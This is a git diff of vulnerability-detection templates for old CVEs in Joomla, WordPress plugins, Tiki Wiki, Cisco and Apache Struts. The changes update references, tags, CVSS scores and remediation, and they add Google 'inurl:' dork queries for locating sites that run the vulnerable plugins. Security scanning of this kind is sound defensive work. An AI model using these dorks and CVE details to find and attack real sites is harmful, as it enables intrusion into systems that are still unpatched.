- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
cve-id: CVE-2010-4239
cwe-id: CWE-20
tags: cve,cve2010,tikiwiki,lfi
@@ -28,3 +30,5 @@ requests:
- "fonts"
- "extensions"
condition: and
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2010/CVE-2010-4282.yaml b/cves/2010/CVE-2010-4282.yaml
index 0f9ef355fd..4e19e82b8b 100644
--- a/cves/2010/CVE-2010-4282.yaml
+++ b/cves/2010/CVE-2010-4282.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/15643
- https://www.cvedetails.com/cve/CVE-2010-4282
+ - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
+ - http://www.exploit-db.com/exploits/15643
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-4282
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,lfi,joomla,phpshowtime
+ tags: phpshowtime,edb,cve,cve2010,lfi,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-4617.yaml b/cves/2010/CVE-2010-4617.yaml
index 8cfa8ebc38..36464505b2 100644
--- a/cves/2010/CVE-2010-4617.yaml
+++ b/cves/2010/CVE-2010-4617.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617
+ - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-4617
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-4719.yaml b/cves/2010/CVE-2010-4719.yaml
index e07fc1fa1c..0e3cfa2a1e 100644
--- a/cves/2010/CVE-2010-4719.yaml
+++ b/cves/2010/CVE-2010-4719.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/15749
- https://www.cvedetails.com/cve/CVE-2010-4719
+ - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt
+ - http://www.exploit-db.com/exploits/15749
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-4719
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-4769.yaml b/cves/2010/CVE-2010-4769.yaml
index 452cb9faae..247d5b55f4 100644
--- a/cves/2010/CVE-2010-4769.yaml
+++ b/cves/2010/CVE-2010-4769.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/15585
- https://www.cvedetails.com/cve/CVE-2010-4769
+ - http://web.archive.org/web/20140803011658/http://secunia.com/advisories/42324/
+ - http://web.archive.org/web/20210121210048/https://www.securityfocus.com/bid/44992/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-4769
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-4977.yaml b/cves/2010/CVE-2010-4977.yaml
index 162f552fed..1da134d5db 100644
--- a/cves/2010/CVE-2010-4977.yaml
+++ b/cves/2010/CVE-2010-4977.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/34250
- https://www.cvedetails.com/cve/CVE-2010-4977
+ - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt
+ - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-4977
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: joomla,lfi,edb,packetstorm,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-5028.yaml b/cves/2010/CVE-2010-5028.yaml
index 5a9d798fc5..89303e05b2 100644
--- a/cves/2010/CVE-2010-5028.yaml
+++ b/cves/2010/CVE-2010-5028.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12601
- https://www.cvedetails.com/cve/CVE-2010-5028
+ - http://www.vupen.com/english/advisories/2010/1269
+ - http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-5028
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-5278.yaml b/cves/2010/CVE-2010-5278.yaml
index da7888acbb..0c0531670c 100644
--- a/cves/2010/CVE-2010-5278.yaml
+++ b/cves/2010/CVE-2010-5278.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/34788
- https://www.cvedetails.com/cve/CVE-2010-5278
+ - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt
+ - http://web.archive.org/web/20140803154716/http://secunia.com/advisories/41638/
classification:
cve-id: CVE-2010-5278
- tags: cve,cve2010,lfi
+ tags: cve,cve2010,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-5286.yaml b/cves/2010/CVE-2010-5286.yaml
index 1523da3700..e5ee8dd902 100644
--- a/cves/2010/CVE-2010-5286.yaml
+++ b/cves/2010/CVE-2010-5286.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/34837
- https://www.cvedetails.com/cve/CVE-2010-5286
+ - http://web.archive.org/web/20210123122507/https://www.securityfocus.com/bid/44053/
+ - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-5286
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2011/CVE-2011-0049.yaml b/cves/2011/CVE-2011-0049.yaml
index d9be2cda41..fd9c04a8a4 100644
--- a/cves/2011/CVE-2011-0049.yaml
+++ b/cves/2011/CVE-2011-0049.yaml
@@ -9,10 +9,11 @@ info:
- https://www.exploit-db.com/exploits/16103
- https://nvd.nist.gov/vuln/detail/CVE-2011-0063
- http://www.kb.cert.org/vuls/id/363726
+ - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-0049
- remediation: Upgrade to a supported version.
- tags: cve,cve2011,majordomo2,lfi
+ tags: cve,cve2011,majordomo2,lfi,edb
requests:
- method: GET
diff --git a/cves/2011/CVE-2011-1669.yaml b/cves/2011/CVE-2011-1669.yaml
index 31619fa484..ff691f2ffc 100644
--- a/cves/2011/CVE-2011-1669.yaml
+++ b/cves/2011/CVE-2011-1669.yaml
@@ -8,10 +8,14 @@ info:
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119
+ - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/
+ - http://www.exploit-db.com/exploits/17119
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-1669
- remediation: Upgrade to a supported version.
- tags: cve,cve2011,wordpress,wp-plugin,lfi
+ metadata:
+ google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
+ tags: edb,cve,cve2011,wordpress,wp-plugin,lfi
requests:
- method: GET
diff --git a/cves/2011/CVE-2011-2744.yaml b/cves/2011/CVE-2011-2744.yaml
index d4ba7d6d90..06ffccf68d 100644
--- a/cves/2011/CVE-2011-2744.yaml
+++ b/cves/2011/CVE-2011-2744.yaml
@@ -7,10 +7,12 @@ info:
description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference:
- https://www.exploit-db.com/exploits/35945
- - https://www.cvedetails.com/cve/CVE-2011-2744
+ - http://www.openwall.com/lists/oss-security/2011/07/13/6
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-2744
+ - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
classification:
cve-id: CVE-2011-2744
- tags: cve,cve2011,lfi,chyrp
+ tags: cve,cve2011,lfi,chyrp,edb
requests:
- method: GET
diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml
index 6b3715bb3b..ed1acfc80c 100644
--- a/cves/2011/CVE-2011-2780.yaml
+++ b/cves/2011/CVE-2011-2780.yaml
@@ -10,15 +10,14 @@ info:
- http://www.openwall.com/lists/oss-security/2011/07/13/5
- http://www.ocert.org/advisories/ocert-2011-001.html
- http://www.openwall.com/lists/oss-security/2011/07/13/6
- - http://www.securityfocus.com/bid/48672
- - http://secunia.com/advisories/45184
- - http://osvdb.org/73891
+ - http://web.archive.org/web/20210121214023/https://www.securityfocus.com/bid/48672/
+ - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
- http://securityreason.com/securityalert/8312
- https://exchange.xforce.ibmcloud.com/vulnerabilities/68565
- - http://www.securityfocus.com/archive/1/518890/100/0/threaded
+ - http://web.archive.org/web/20201207104106/https://www.securityfocus.com/archive/1/518890/100/0/threaded
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-2780
- remediation: Upgrade to a supported version.
tags: cve,cve2011,lfi,chyrp
requests:
diff --git a/cves/2011/CVE-2011-3315.yaml b/cves/2011/CVE-2011-3315.yaml
index 0a70217e79..7406986eb6 100644
--- a/cves/2011/CVE-2011-3315.yaml
+++ b/cves/2011/CVE-2011-3315.yaml
@@ -4,15 +4,15 @@ info:
name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
author: daffainfo
severity: high
- description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express
- (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers
- to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
+ description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
reference:
- https://www.exploit-db.com/exploits/36256
+ - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx
+ - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-3315
- remediation: Upgrade to a supported version.
- tags: cve,cve2011,lfi,cisco
+ tags: cve,cve2011,lfi,cisco,edb
requests:
- method: GET
diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml
index 43736129ab..e66d9aed23 100644
--- a/cves/2011/CVE-2011-4336.yaml
+++ b/cves/2011/CVE-2011-4336.yaml
@@ -7,15 +7,15 @@ info:
description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- - https://www.securityfocus.com/bid/48806/info
+ - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info
- https://seclists.org/bugtraq/2011/Nov/140
+ remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2011-4336
cwe-id: CWE-79
- remediation: Upgrade to a supported version.
- tags: cve,cve2011,xss,tikiwiki
+ tags: seclists,cve,cve2011,xss,tikiwiki
requests:
- method: GET
diff --git a/cves/2011/CVE-2011-4618.yaml b/cves/2011/CVE-2011-4618.yaml
index bf551e83a6..ff441dcef2 100644
--- a/cves/2011/CVE-2011-4618.yaml
+++ b/cves/2011/CVE-2011-4618.yaml
@@ -1,15 +1,19 @@
id: CVE-2011-4618
info:
- name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting
+ name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-4618
+ - http://web.archive.org/web/20210121070605/https://www.securityfocus.com/archive/1/520589
+ - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-4618
- remediation: Upgrade to a supported version.
+ metadata:
+ google-query: inurl:"/wp-content/plugins/advanced-text-widget"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
@@ -20,9 +24,9 @@ requests:
matchers-condition: and
matchers:
- type: word
+ part: body
words:
- ""
- part: body
- type: word
part: header
diff --git a/cves/2011/CVE-2011-4624.yaml b/cves/2011/CVE-2011-4624.yaml
index c9c03654bf..2df94565af 100644
--- a/cves/2011/CVE-2011-4624.yaml
+++ b/cves/2011/CVE-2011-4624.yaml
@@ -1,15 +1,19 @@
id: CVE-2011-4624
info:
- name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting
+ name: GRAND FlAGallery 1.57 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-4624
+ - http://www.openwall.com/lists/oss-security/2011/12/23/2
+ - http://plugins.trac.wordpress.org/changeset/469785
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-4624
- remediation: Upgrade to a supported version.
+ metadata:
+ google-query: inurl:"/wp-content/plugins/flash-album-gallery"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2011/CVE-2011-4804.yaml b/cves/2011/CVE-2011-4804.yaml
index c29a71af73..5f1881d151 100644
--- a/cves/2011/CVE-2011-4804.yaml
+++ b/cves/2011/CVE-2011-4804.yaml
@@ -7,11 +7,13 @@ info:
description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/36598
- - https://www.cvedetails.com/cve/CVE-2011-4804
+ - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
+ - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-4804
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-4804
- remediation: Upgrade to a supported version.
- tags: cve,cve2011,joomla,lfi
+ tags: lfi,edb,cve,cve2011,joomla
requests:
- method: GET
diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml
index 613926464b..decfdfeee6 100644
--- a/cves/2011/CVE-2011-4926.yaml
+++ b/cves/2011/CVE-2011-4926.yaml
@@ -1,15 +1,19 @@
id: CVE-2011-4926
info:
- name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
+ name: Adminimize 1.7.22 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-4926
- https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
+ - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
+ - http://www.openwall.com/lists/oss-security/2012/01/10/9
classification:
cve-id: CVE-2011-4926
+ metadata:
+ google-query: inurl:"/wp-content/plugins/adminimize/"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
@@ -20,9 +24,9 @@ requests:
matchers-condition: and
matchers:
- type: word
+ part: body
words:
- ""
- part: body
- type: word
part: header
diff --git a/cves/2011/CVE-2011-5106.yaml b/cves/2011/CVE-2011-5106.yaml
index 6ffc85f1a1..031d518512 100644
--- a/cves/2011/CVE-2011-5106.yaml
+++ b/cves/2011/CVE-2011-5106.yaml
@@ -1,15 +1,19 @@
id: CVE-2011-5106
info:
- name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting
+ name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-5106
- https://wordpress.org/plugins/flexible-custom-post-type/#developers
+ - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type
+ - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/
classification:
cve-id: CVE-2011-5106
+ metadata:
+ google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2011/CVE-2011-5107.yaml b/cves/2011/CVE-2011-5107.yaml
index 612790ace8..12f1dd5f56 100644
--- a/cves/2011/CVE-2011-5107.yaml
+++ b/cves/2011/CVE-2011-5107.yaml
@@ -1,14 +1,19 @@
id: CVE-2011-5107
info:
- name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting
+ name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/
+ - http://web.archive.org/web/20210121220155/https://www.securityfocus.com/bid/50743/
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413
+ - http://web.archive.org/web/20201208110708/https://www.securityfocus.com/archive/1/520590/100/0/threaded
classification:
cve-id: CVE-2011-5107
+ metadata:
+ google-query: inurl:"/wp-content/plugins/alert-before-your-post"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2011/CVE-2011-5179.yaml b/cves/2011/CVE-2011-5179.yaml
index ac7a235b53..b5cb25da6d 100644
--- a/cves/2011/CVE-2011-5179.yaml
+++ b/cves/2011/CVE-2011-5179.yaml
@@ -1,14 +1,19 @@
id: CVE-2011-5179
info:
- name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting
+ name: Skysa App Bar 1.04 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-5179
+ - http://web.archive.org/web/20210615122339/https://www.securityfocus.com/bid/50824
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486
+ - http://web.archive.org/web/20210614205347/https://www.securityfocus.com/archive/1/520662/100/0/threaded
classification:
cve-id: CVE-2011-5179
+ metadata:
+ google-query: inurl:"/wp-content/plugins/skysa-official/"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml
index c277e63600..91e39c5c91 100644
--- a/cves/2011/CVE-2011-5181.yaml
+++ b/cves/2011/CVE-2011-5181.yaml
@@ -1,14 +1,18 @@
id: CVE-2011-5181
info:
- name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting
+ name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+ - http://web.archive.org/web/20210123155244/https://www.securityfocus.com/bid/50778/
+ - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/
classification:
cve-id: CVE-2011-5181
+ metadata:
+ google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml
index 538032943f..f3b3a24e05 100644
--- a/cves/2011/CVE-2011-5265.yaml
+++ b/cves/2011/CVE-2011-5265.yaml
@@ -1,14 +1,18 @@
id: CVE-2011-5265
info:
- name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting
+ name: Featurific For WordPress 1.6.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-5265
+ - http://web.archive.org/web/20210123103000/https://www.securityfocus.com/bid/50779/
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468
classification:
cve-id: CVE-2011-5265
+ metadata:
+ google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml
index 44ad07aa43..4058bcdd5b 100644
--- a/cves/2012/CVE-2012-0392.yaml
+++ b/cves/2012/CVE-2012-0392.yaml
@@ -7,10 +7,13 @@ info:
description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
reference:
- https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545
+ - http://www.exploit-db.com/exploits/18329
+ - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html
+ - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393
+ remediation: Developers should immediately upgrade to at least Struts 2.3.18.
classification:
cve-id: CVE-2012-0392
- remediation: Developers should immediately upgrade to at least Struts 2.3.18.
- tags: cve,cve2012,apache,rce,struts,java
+ tags: cve2012,apache,rce,struts,java,edb,cve
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-0896.yaml b/cves/2012/CVE-2012-0896.yaml
index f6478d409d..77982c182d 100644
--- a/cves/2012/CVE-2012-0896.yaml
+++ b/cves/2012/CVE-2012-0896.yaml
@@ -7,10 +7,14 @@ info:
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
reference:
- https://packetstormsecurity.com/files/108631/
- - https://www.cvedetails.com/cve/CVE-2012-0896
+ - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
+ - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
+ - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
classification:
cve-id: CVE-2012-0896
- tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal
+ metadata:
+ google-query: inurl:"/wp-content/plugins/count-per-day"
+ tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-0901.yaml b/cves/2012/CVE-2012-0901.yaml
index 0e96e46920..a8ca09950e 100644
--- a/cves/2012/CVE-2012-0901.yaml
+++ b/cves/2012/CVE-2012-0901.yaml
@@ -1,15 +1,19 @@
id: CVE-2012-0901
info:
- name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting
+ name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-0901
+ - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271
classification:
cve-id: CVE-2012-0901
- tags: cve,cve2012,wordpress,xss,wp-plugin
+ metadata:
+ google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin"
+ tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-0981.yaml b/cves/2012/CVE-2012-0981.yaml
index eed1d3fafd..abd78bb082 100644
--- a/cves/2012/CVE-2012-0981.yaml
+++ b/cves/2012/CVE-2012-0981.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/18435
- https://www.cvedetails.com/cve/CVE-2012-0981
+ - http://web.archive.org/web/20151016200610/http://secunia.com/advisories/47802/
+ - http://www.exploit-db.com/exploits/18435
classification:
cve-id: CVE-2012-0981
- tags: cve,cve2012,lfi,phpshowtime
+ tags: phpshowtime,edb,cve,cve2012,lfi
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml
index 1564e8e689..3d6345a868 100644
--- a/cves/2012/CVE-2012-0991.yaml
+++ b/cves/2012/CVE-2012-0991.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
+ - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/
+ - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
classification:
cve-id: CVE-2012-0991
- tags: cve,cve2012,lfi,openemr,traversal
+ tags: lfi,openemr,traversal,edb,cve,cve2012
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-0996.yaml b/cves/2012/CVE-2012-0996.yaml
index be246dfabe..50bf5aa1a6 100644
--- a/cves/2012/CVE-2012-0996.yaml
+++ b/cves/2012/CVE-2012-0996.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/36784
- https://www.cvedetails.com/cve/CVE-2012-0996
+ - https://www.htbridge.ch/advisory/HTB23071
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2012-0996
- remediation: Upgrade to a supported version.
- tags: cve,cve2012,lfi
+ tags: cve,cve2012,lfi,edb
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-1226.yaml b/cves/2012/CVE-2012-1226.yaml
index a8174b8cb1..b0edd8260f 100644
--- a/cves/2012/CVE-2012-1226.yaml
+++ b/cves/2012/CVE-2012-1226.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/36873
- https://www.cvedetails.com/cve/CVE-2012-1226
+ - http://web.archive.org/web/20210508221434/https://www.securityfocus.com/archive/1/521583
+ - http://www.vulnerability-lab.com/get_content.php?id=428
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2012-1226
- remediation: Upgrade to a supported version.
- tags: cve,cve2012,lfi,dolibarr,traversal
+ tags: cve,cve2012,lfi,dolibarr,traversal,edb
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml
index 52c1f5a03a..0e4bcec9e2 100644
--- a/cves/2012/CVE-2012-1823.yaml
+++ b/cves/2012/CVE-2012-1823.yaml
@@ -9,9 +9,11 @@ info:
reference:
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
+ - https://bugs.php.net/bug.php?id=61910
+ - http://www.php.net/ChangeLog-5.php#5.4.2
classification:
cve-id: CVE-2012-1823
- tags: rce,php,cve,cve2012
+ tags: cve2012,kev,vulhub,rce,php,cve
requests:
- raw:
diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml
index f7318bb8d6..dd6dc50478 100644
--- a/cves/2012/CVE-2012-1835.yaml
+++ b/cves/2012/CVE-2012-1835.yaml
@@ -1,16 +1,19 @@
id: CVE-2012-1835
info:
- name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting
+ name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter
